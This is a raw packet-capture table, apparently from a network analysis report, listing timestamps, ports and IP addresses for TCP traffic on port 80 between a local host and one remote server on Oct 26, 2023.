                                                                              Oct 26, 2023 09:47:47.667229891 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.667268038 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.667332888 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.667347908 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.667362928 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.667385101 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.667397976 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.667402983 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.667433023 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.668698072 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.668767929 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.668802977 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.668854952 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.669368982 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.669420004 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.669941902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.669990063 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.669991970 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.670037031 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.670051098 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.670095921 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.707860947 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.707885981 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.707901001 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.707926989 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.707928896 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.707962036 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.707998037 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708028078 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708069086 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708076000 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708118916 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708138943 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708180904 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708244085 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708280087 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708319902 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708334923 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708375931 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708390951 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708405018 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708431959 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708667040 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708703995 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708708048 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708751917 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708784103 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708820105 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.708825111 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.708863974 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709688902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.709719896 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.709734917 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709758997 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709778070 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.709815979 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709851980 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.709893942 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.709897041 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709933996 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.709970951 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710006952 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710020065 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710057020 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710073948 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710114002 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710594893 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710633039 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710638046 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710679054 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710679054 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710722923 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710794926 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710833073 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710840940 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710880041 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710915089 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.710952997 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.710985899 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711021900 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711205959 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711250067 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711267948 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711303949 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711321115 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711359024 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711365938 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711404085 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711421013 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711457968 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711471081 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711519003 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711530924 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711569071 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711580038 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711617947 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711702108 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711734056 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711747885 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711796045 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711829901 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711836100 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711879969 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711910963 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711922884 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.711949110 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711977959 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.711987972 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712011099 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712220907 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712260008 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712335110 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712373972 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712407112 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712445974 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712476969 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712513924 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712518930 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712552071 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712568998 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712618113 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712630033 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712666988 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712680101 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712692022 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712724924 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712732077 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712738037 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712774038 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712811947 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712838888 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712848902 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712881088 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712918043 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.712956905 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.712964058 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713001013 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713161945 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713200092 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713248968 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713284969 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713354111 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713401079 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713422060 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713455915 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713495970 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713527918 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713584900 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713615894 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713655949 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713689089 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713730097 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713764906 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713828087 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713860989 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713896036 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.713927031 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.713979959 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714046955 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714066029 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714080095 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714282990 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714318037 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714415073 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714447975 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714553118 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714586020 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714616060 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714646101 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714647055 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714679003 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714687109 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714719057 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714740992 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714776039 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714802027 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714834929 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714864016 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.714899063 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.714975119 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715013981 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715043068 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715075970 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715117931 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715150118 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715161085 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715195894 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715224981 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715256929 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715284109 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715316057 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715334892 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715365887 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715390921 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715428114 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715487003 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715517998 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715562105 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715593100 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715670109 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715703964 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715748072 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715779066 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715827942 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715861082 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715894938 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715928078 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.715955973 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.715989113 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716016054 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716048956 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716058016 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716089964 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716116905 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716147900 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716264009 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716296911 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716324091 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716356993 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716383934 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716418028 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716499090 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716531038 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716650963 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716681957 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716722012 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716754913 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716767073 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716799974 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716815948 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716846943 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716939926 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.716974020 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.716996908 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717030048 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717056990 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717087984 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717111111 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717142105 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717147112 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717174053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717298985 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717358112 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717364073 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717416048 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717483997 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717511892 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717519045 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717545986 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717588902 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717622042 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717663050 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717694044 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717719078 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717758894 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717782974 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717818975 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717859030 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717895985 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717911005 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.717950106 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.717967987 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718007088 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718075037 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718111992 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718151093 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718178034 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718193054 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718213081 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718249083 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718300104 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718332052 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718369007 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718369961 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718405008 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718626022 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718668938 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718693972 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718734026 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718758106 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718796015 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718816996 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718854904 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718878984 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718914032 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.718938112 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718974113 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.718976974 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719010115 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719172955 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719221115 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719269991 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719310045 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719336033 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719378948 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719378948 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719417095 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719485044 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719532013 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719540119 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719574928 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719602108 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719644070 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719691992 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719729900 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719754934 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719790936 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719815969 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719851971 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719882011 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719923019 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719947100 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.719984055 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.719995022 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720036983 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720062017 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720098972 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720113039 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720155954 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720182896 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720215082 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720221043 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720251083 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720283985 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720334053 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720350981 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720388889 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720431089 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720468044 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720534086 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.720581055 CEST4975180192.168.2.777.91.68.249
                                                                              Oct 26, 2023 09:47:47.720916033 CEST804975177.91.68.249192.168.2.7
                                                                              Oct 26, 2023 09:47:47.721035957 CEST804975177.91.68.249192.168.2.7
